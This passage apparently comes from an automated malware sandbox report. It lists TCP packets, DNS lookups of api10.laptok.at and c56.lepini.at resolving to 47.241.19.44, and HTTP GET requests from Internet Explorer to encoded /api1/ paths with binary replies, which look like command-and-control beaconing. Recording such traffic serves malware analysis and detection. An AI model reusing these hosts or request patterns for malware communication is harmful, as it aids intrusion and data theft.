Nov 24, 2020 21:20:09.326261044 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.326298952 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.326337099 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.326385975 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.326426983 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.326447010 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.326466084 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.326484919 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.326494932 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.326508045 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.326570988 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.329256058 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.379180908 CET  49752  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.590087891 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.696793079 CET  80  49752  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:10.187980890 CET  80  49752  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:10.188031912 CET  80  49752  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:10.188329935 CET  49752  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:10.189064026 CET  49752  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:10.466381073 CET  80  49752  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:10.656172037 CET  49755  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:10.656227112 CET  49754  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:10.921529055 CET  80  49755  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:10.921843052 CET  49755  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:10.923018932 CET  80  49754  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:10.923171043 CET  49754  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:10.932638884 CET  49754  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:11.240003109 CET  80  49754  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:11.915036917 CET  80  49754  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:11.915086031 CET  80  49754  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:11.915113926 CET  80  49754  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:11.915154934 CET  49754  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:11.915214062 CET  49754  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:11.917689085 CET  49754  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:12.184501886 CET  80  49754  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:12.933526993 CET  49755  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:47.278345108 CET  49758  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:47.540668964 CET  80  49758  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:47.541126966 CET  49758  80  192.168.2.3  47.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:47.541162014 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:47.845313072 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222243071 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222305059 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222347021 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222367048 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.222404003 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222456932 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222493887 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.222507954 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222563028 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222598076 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.222618103 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222668886 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222686052 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.222723961 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222856998 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.484675884 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484728098 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484766960 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484806061 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484850883 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484858036 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.484879017 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.484915972 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484977007 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484992027 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485034943 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485076904 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485116959 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485129118 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485174894 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485225916 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485232115 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485282898 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485328913 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485347033 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485411882 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485443115 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485483885 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485543013 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485584021 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485594988 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485644102 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485671997 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485697985 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485723972 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747396946 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747454882 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747494936 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747534990 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747575998 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747591019 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747610092 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747638941 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747683048 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747720957 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747742891 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747782946 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747788906 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747840881 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747885942 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747936010 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747940063 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747997046 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748042107 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748050928 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.748091936 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.748097897 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748150110 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748198032 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748241901 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748251915 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.748297930 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748347998 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748368025 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.748661995 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850639105 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850658894 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850675106 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850687027 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850698948 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850722075 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850735903 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850750923 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850759029 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850775003 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850791931 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850804090 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850815058 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850828886 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850836039 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850853920 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850867033 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850873947 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850891113 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850899935 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850913048 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850929022 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850939035 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850949049 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850965977 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850981951 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850990057 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.851015091 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.898394108 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.010006905 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.054749012 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060220003 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060272932 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060312033 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060353041 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060395002 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060436010 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060451984 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060494900 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060549974 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060556889 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060610056 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060647011 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060686111 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060714006 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060739994 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060786009 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060817957 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060827971 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060877085 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060883045 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060939074 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060981035 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.061008930 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.061033964 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.061077118 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.061120987 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.061142921 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.061595917 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.081959963 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.112587929 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.164094925 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.316627026 CET804975847.241.19.44192.168.2.3

                                                                                                                                      UDP Packets


                                                                                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 24, 2020 21:19:17.724993944 CET | 192.168.2.3 | 8.8.8.8 | 0xeb32 | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
Nov 24, 2020 21:20:01.575886011 CET | 192.168.2.3 | 8.8.8.8 | 0x3607 | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
Nov 24, 2020 21:20:06.169200897 CET | 192.168.2.3 | 8.8.8.8 | 0xce1f | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
Nov 24, 2020 21:20:47.239192009 CET | 192.168.2.3 | 8.8.8.8 | 0x2611 | Standard query (0) | c56.lepini.at | A (IP address) | IN (0x0001)

                                                                                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 24, 2020 21:19:17.760394096 CET | 8.8.8.8 | 192.168.2.3 | 0xeb32 | No error (0) | api10.laptok.at | | 47.241.19.44 | A (IP address) | IN (0x0001)
Nov 24, 2020 21:20:01.611551046 CET | 8.8.8.8 | 192.168.2.3 | 0x3607 | No error (0) | api10.laptok.at | | 47.241.19.44 | A (IP address) | IN (0x0001)
Nov 24, 2020 21:20:06.205080986 CET | 8.8.8.8 | 192.168.2.3 | 0xce1f | No error (0) | api10.laptok.at | | 47.241.19.44 | A (IP address) | IN (0x0001)
Nov 24, 2020 21:20:47.274983883 CET | 8.8.8.8 | 192.168.2.3 | 0x2611 | No error (0) | c56.lepini.at | | 47.241.19.44 | A (IP address) | IN (0x0001)

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • api10.laptok.at
                                                                                                                                      • c56.lepini.at

                                                                                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49732 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Nov 24, 2020 21:19:18.053018093 CET | 184 | OUT | GET /api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wfxlV_2BR_/2BKRWfbGdbKpccDlq/wjU_2FWdPQ1P/mnarl1yMJqa/qdhNVoh3oOz5bs/z60RqTSIuCKm6aR4446gj/CWuUplffN3IjYKGv/jAh08Sky_2BsVaS/mR26uhXrf_2FPOtRsi/kAWpATwOt/nHT1d49Zze7GI739MC4q/fqUVMDgzP8AWQSOV_2B/UYhCEI1zFK8E9H5v_0A_0D/bl8Ojy2x17tuP/HyuqS2KW/QxDOc9ASBROfBvf26kniC8O/wYs HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive
Nov 24, 2020 21:19:19.034208059 CET | 197 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 24 Nov 2020 20:19:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49751 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Nov 24, 2020 21:20:01.881902933 CET | 4054 | OUT | GET /api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive
Nov 24, 2020 21:20:02.933356047 CET | 4055 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Nov 2020 20:20:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip
                                                                                                                                      Nov 24, 2020 21:20:02.933614016 CET4062INData Raw: 16 bd 82 bd 31 fb 4c 05 9b ab b4 0d fe d3 91 6c 21 d9 52 44 60 08 66 69 3d 6a 98 71 f8 f0 cd 7b ea 23 a6 46 d5 61 0a d2 81 9e 88 7f d8 4f ff 63 10 1e ac 46 c0 6d a9 0f 3b 96 b7 ac c7 1c 88 39 6e 72 7a 1d 77 76 8a 0a 57 00 7c 7e 0c 35 72 80 85 f1
                                                                                                                                      Data Ascii: 1Ll!RD`fi=jq{#FaOcFm;9nrzwvW|~5r:C1s*K/d3>ix!fIQ%xj6Ug_8|S&X.W&9M5I)ld$eZMCtNF35Nm "dNi*jBy\{8EznbMx-z'
                                                                                                                                      Nov 24, 2020 21:20:02.972738981 CET4064INData Raw: 15 68 2f b1 d0 cb 7b 53 76 80 fa 4f 85 b8 e3 77 3f c1 0d b1 37 bb b1 40 70 01 a5 7a 56 9f 4d 53 36 b4 d9 11 8d 70 1e 29 eb 02 82 29 bb 3a 7c 05 fe 96 bc b3 1d 05 67 37 9d df 18 b1 9d 00 f2 91 76 8f 93 07 47 b8 74 24 4b 67 4d 41 37 80 fb 83 db c3
                                                                                                                                      Data Ascii: h/{SvOw?7@pzVMS6p)):|g7vGt$KgMA7z0Byb\?bujZ~s<tZc[VL2#Ov?0/,#!'P]:qnJ(0{vi^8M<W$>i\{uJwcW2d;Y@}~dp
                                                                                                                                      Nov 24, 2020 21:20:02.972799063 CET4065INData Raw: 64 77 94 50 f8 ff f8 f5 0d 73 28 8c c9 b7 15 0d 5c 96 f8 a1 c6 8a 40 6e 91 15 b7 2b a7 53 65 00 a9 62 36 45 06 75 92 44 90 0f e8 4f 8e e7 4b 87 7c 3b 9b 67 4b 73 66 3f f6 83 8a 02 77 f3 47 7b 0f df b2 83 c5 76 2f f0 8b 36 e3 21 ab b7 9e 57 44 d4
                                                                                                                                      Data Ascii: dwPs(\@n+Seb6EuDOK|;gKsf?wG{v/6!WDlb{8,yRu]Ig:uN}4fS9KP^?_7fa}Cz8X\N69}ey30VBH~<Mm&Ir.z"6aY^g6|F3N5+I}l3
                                                                                                                                      Nov 24, 2020 21:20:02.972841024 CET4067INData Raw: 35 da ae fe cb 63 3e 80 6c 10 3a 97 04 41 4c f9 17 7b 8c c8 c2 d7 10 fe e1 2b 73 1d 76 e2 2e ad 28 56 a5 57 2a 8f 61 92 41 b2 de 7e a0 6a f5 e5 5f 66 11 89 45 38 44 e8 a4 24 60 84 e8 36 09 2d 75 f5 35 bf 95 39 a5 33 a3 0d f2 be ca c2 50 97 d1 0f
                                                                                                                                      Data Ascii: 5c>l:AL{+sv.(VW*aA~j_fE8D$`6-u593PbpA(GwW<ZTD%bk-V?+D,xg{>]!o]5<fjvET%Q"|aF]ff2#Ixi[ifuiLt&f_
                                                                                                                                      Nov 24, 2020 21:20:02.972877979 CET4068INData Raw: f1 af 49 4b f6 f5 40 74 2d 77 84 fc e3 a4 24 ae ca bf 3b eb 18 d9 71 fa 7f 52 41 f4 65 34 95 bb 9b df 10 a0 5b 4d 36 2f 7f 45 07 df bf bf 39 80 7b fd 13 dd ec 51 83 33 ac b4 3f 01 9f a2 7d 09 1b 24 44 9e 60 57 58 6c 0c 8d fa 54 7d 84 b2 57 a8 49
                                                                                                                                      Data Ascii: IK@t-w$;qRAe4[M6/E9{Q3?}$D`WXlT}WI?~#T_=i4LI/kBsn J;y74/}O(Y)I0djQ"8]jhvhgb7[Szi7c#TFHZd{9+,dG5(SS
                                                                                                                                      Nov 24, 2020 21:20:03.189378977 CET4070INData Raw: 04 7d 25 d5 e0 00 73 df 1b b4 62 fb cb 25 62 e1 c7 fe b2 76 9d e0 d3 03 44 0a fc b2 2c a4 ca ac 57 46 d7 70 35 e1 27 82 4e 54 49 fd 4a 25 77 f1 ee 41 6a b5 f5 da 09 8e a5 dd 27 90 41 3e 8e 27 44 40 a6 99 d6 d2 a3 76 eb 52 31 3f ee da 4f 7d e8 d7
                                                                                                                                      Data Ascii: }%sb%bvD,WFp5'NTIJ%wAj'A>'D@vR1?O}[)j\'WwHCA$L2/b?VO7T_YiY8F=Wf^'YAy$<T'$s-:qE -Bx


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49750 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Nov 24, 2020 21:20:04.595921040 CET | 4267 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: api10.laptok.at
Connection: Keep-Alive
Nov 24, 2020 21:20:05.392426014 CET | 4268 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 24 Nov 2020 20:20:05 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49753 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Nov 24, 2020 21:20:06.486884117 CET | 4269 | OUT | GET /api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive
Nov 24, 2020 21:20:07.513534069 CET | 4271 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Nov 2020 20:20:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49752 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Nov 24, 2020 21:20:09.379180908 CET | 4539 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: api10.laptok.at
Connection: Keep-Alive
Nov 24, 2020 21:20:10.187980890 CET | 4539 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 24 Nov 2020 20:20:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49754 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
